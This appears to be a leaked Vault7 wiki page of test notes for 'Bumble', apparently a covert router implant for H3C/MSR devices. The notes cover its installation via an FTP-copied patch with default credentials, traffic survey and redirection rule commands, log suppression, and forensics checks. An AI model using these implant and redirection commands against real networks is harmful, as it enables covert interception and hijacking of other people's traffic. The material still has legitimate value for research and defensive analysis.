Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #14587667
Bumble 3.0.0/3.1 Test Notes
Test Summary
- Downloaded and installed Ubuntu Server 10.04. This is the library version that was delievered with Bumble.
- CT 2.4 which was delieved is not compatible with current ICON image (Debian 7.8)
- MTU settings
- CT MTUMaximum Transmission Unit setting can not go below 120 bytes.
- Egress from Atk setting delaysim MTU<=108 and CTCounter Terrorism MTU<128 allows CTCounter Terrorism to connect, but states "currenct packet size restrictions are incompatible with selected Score protocol".
- Ingress to Atk MTU<=508Bytes.
- Score requires a minimum MTUMaximum Transmission Unit of 480Bytes for return traffic (from implant to CTCounter Terrorism).
- Flux will not be used with this tool so it will not be tested with flux.
Progress/Notes
- Sample survey commands:
tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 icmp -en
tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- Sampe redirection rule:
- redir create 10.1.243.2 255.255.255.255 0 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 255.255.255.255 0 0 tcp 10.1.243.2 0 XXX.X.XXX.XXX (JUMPSTART-5[US]) 0 0 -en
ID | Status | Task |
---|---|---|
2 | complete | Potential bug:
|
ID | Status | Task |
---|---|---|
16 | complete | Potential Bug: When running my expect script, copying the patch.bin file timed out. Afterwards I attempted to reboot the H3C and it gave the belowmessage. This occurred when I used the command "copy ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/patch.bin patch.bin" to copy the patch file. This is not the recommended way to copy the file. No bug to report at this time. |
ID | Status | Task |
---|---|---|
17 | complete | Potential Bug: It appears that if the patch.bin file exists on cfa0: and you attempt to copy it again, it "copies" indefinitely. Issuing the command "dir cfa0:" shows that the patch.bin file size is 0. This may occurr when the patch file was incompletely applied. This may have just occurred when I used the command "copy ftp://administrator:password@XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US])/patch.bin patch.bin" to copy the patch file. This is not the recommended way to copy the file. No bug to report at this time. |
Tests
- Smoke Tests
- Install PBD and Establish Comms
- Refer to Bumble command script on share.
-
Survey - ct_pt1-survey.exp
- Reboot DUT, install implant, establish comms via CT.
- Confirm implant is installed and activate score
- tp cmd "pbd probe"
- module show
- redir show
- module start score
- module show (confirm score is activated)
- redir show (there should be no rules)
- Add survey rule: tp survey create XXX.X.XXX.X (JUMPSTART-5[US]) 255.255.255.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- redir show
- <sleep for 20 seconds to allow time to survey>
- Retrieve trans table: tp showtrans
- quit
-
Successfully tested with the following Bumble versions:
- Bumble 3.0.0
- Bumble 3.1 Beta (9/15/2015 w/o latency)
- Redirection - ct_pt2-redir.exp
- Reboot DUT, install implant, establish comms via CT.
- Confirm implant is installed and activate score (see Test 2 for commands to run)
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0
- Source IP/Mask: 192.168.254.6/32 - Atk VM
- Source Port Range: 0 0 (any)
- Destination IP/Mask: XXX.XXX.X.XX (GB)/32 - WWW3
- Destination Port Range: 0 0 (any)
- Protocol: TCP
- New Source IP:Port: 192.168.254.6:0 - Atk VM
- New Destination IP:Port: XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]):0 - WWW4
- TTL: 0 (don't change)
-
Successfully tested with the following Bumble versions:
- Bumble 3.0.0
- Bumble 3.1 Beta (9/16/15 w/o latency)
- Transaction Table rollover
- Reboot DUT, install implant, establish comms via CT.
- Start score: module start score
- Configure transtable aging time to 1 second: tp filter -t 1
- From Atk: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #3 - XXX.XXX.X.XX (GB)
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XXX.XXX.X.XX (GB) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- Test redir rule: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
- Fill up transtable (run Ixia)
Add a survey rule: tp survey create 192.0.0.0 255.0.0.0 0 0.0.0.0 0.0.0.0 0 tcp -en
- Check if redir still functions correctly: wget --output-document=- http://XXX.XXX.X.XX (GB)
- Response should be from Bumble webserver #4 - XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US])
- Swiffer - Log Suppression
- Install PBD and Establish Comms
- Redirection Test - ACLAccess Control List circumvention
- Not plausible with current implant hook point
- Redirection Test (Lack of route on downstream router)
- Single Rule - ct_pt3-redir.exp (script starts at step iv)
- Add default route to ASR: ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSR
- From atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.
- Remove default route from ASR: no ip route 0.0.0.0 0.0.0.0 XXX.XXX.XX.X (EU-MAP-5[US]) name To_MSR
- From atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should fail.
- Add redir rule: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- From atk VM, ping XXX.XXX.XX.X (EU-MAP-5[US]). It should be successful.
-
Successfully tested with the following Bumble versions:
- Bumble 3.1 Beta (9/16/2015 w/o latency)
-
Multiple Rules
-
Repeat steps from previous test. Use the following rules:
- Loopback on ASR1002: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.X (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 any XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
-
Successfully tested with the following Bumble versions:
- Bumble 3.1 Beta (9/17/2015 w/o latency)
-
Repeat steps from previous test. Use the following rules:
- Single Rule - ct_pt3-redir.exp (script starts at step iv)
- Redirection Test - Only specified protocol gets redirected
- Add redirection rule to allow TCPTransport Control Protocol from Atk VMVirtual Machine to WWW4 behind ASR: redir create 192.168.254.6 255.255.255.255 0 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 255.255.255.255 0 0 tcp XXX.XXX.XX.X (EU-MAP-5[US]) 0 XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) 0 0 -en
- Retrieve webpage from Atk VM: wget --output-document=- http://XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]) This should successfully retreive the webpage.
- From Atk VM, ping XX.XX.XXX.XX (EARTHLINKBUSINESS-BLK[US]). You should not get a ping response.
-
Successfully tested with the following Bumble versions:
- Bumble 3.1 Beta (9/17/2015 w/o latency)
- Redirection Test - Lack of routes on MSR
- What would be a good scenario?
- Redirection Test - NMAPNetwork security scanner Scan
- Add redir rule
- Start IXIA traffic
- Start limited nmap scan
- Swiffer while redir rules enabled
- Repeat test 3.
- Redirection Test - MiTM
- Not applicable to JQJARGON. Functionality not tested.
- Survey and Redirection used simultaneously
- This is NOT recommended, so it will not be tested.
- Forensics Test - Inspect Netflow on SolarWinds
- Ad hoc test - ICON disconnected during PBD (patch) installation
- telnet 192.168.168.5 (admin/admin)
ftp XXX.XXX.XXX.X (DNIC-RNET-192-100-100[US]) (administrator/password)
- ftp patch file to MSR.
- bin
- get patch.bin
- quit
- dir cfa0: !Confirm patch.bin was copied
- install activate patch cfa0:/patch.bin slot 0
- Before the patch completes, reboot the ICON VM.
- BUM-3
- Reconfigured interface
- With implant installed, configure another gigabit interface.
- No observables - Successfully testing with the following Bumble versions:
- Bumble 3.0.0
- Install PBD when PBD is already installed
- Uninstall PBD and re-attack
- Forensics Tests
- Uninstall and check for remnants left behind
- Inspect pcap
- Performance testing (IXIA)
- Add IXIA ports directly to MSR. Need to determine IPs to use (look at config).
- Configure IXIA "hosts" to test connectivity to WWW1 and WWW2 (XXX.X.XXX.XXX (JUMPSTART-5[US]) & .112).
- Backup MSR config
- Copy off MSR f/w
- Upload MSR f/w
Operator Notes
- Do not use survey and redirection at the same time.
ToDo:
ID | Status | Task |
---|---|---|
14 | complete | User #14587667 Delete default route on all routers (except MSR) after testbed complete (Not sure I should do this). May just test redirection traversing an ACL. Neighboring routers probably have routes back to the H3C, however secondary neighbors may not have routes back. May be useful to re-configure testbed to have secondary routers that don't have routes back to H3C. Deleted on all routers except 3845, 2811, and 2911 |
15 | complete | User #14587667 Get 2800 router from NDBNetwork Devices Branch Lab (R6/U27) |
6 | complete | User #14587667 Put 1E1 HWIC in 2800 router |
7 | complete | User #14587667 Setup SNMPSimple Network Management Protocol on solarwinds and configure MSR. |
8 | complete | User #14587667 Setup loopbacks on MSR neighbor routes. Use downstream IPs from MSR static routes. |
5 | complete | User #14587667 Configure syslog server |
3 | complete | User #14587667 Configure OSPFOpen Shortest Path First on MSR |
10 | complete | User #14587667 Configure OSPFOpen Shortest Path First on Cisco (Grabe new router and use Gig int for OSPFOpen Shortest Path First - per target config). Use IP 192.168.168.5/30 on MSR and 192.168.168.6 on Cisco. |
0 | complete | User #14587667 Configure E1 links |
11 | complete | User #14587667 Configure netstream on MSR interface to TRCore (in-/out-bound). |
12 | complete | User #14587667 Configure netstream on MSR interface to 2911 (inbound). |
13 | complete | User #14587667 Confirm netflow is being collect by SolarWinds |
1 | incomplete |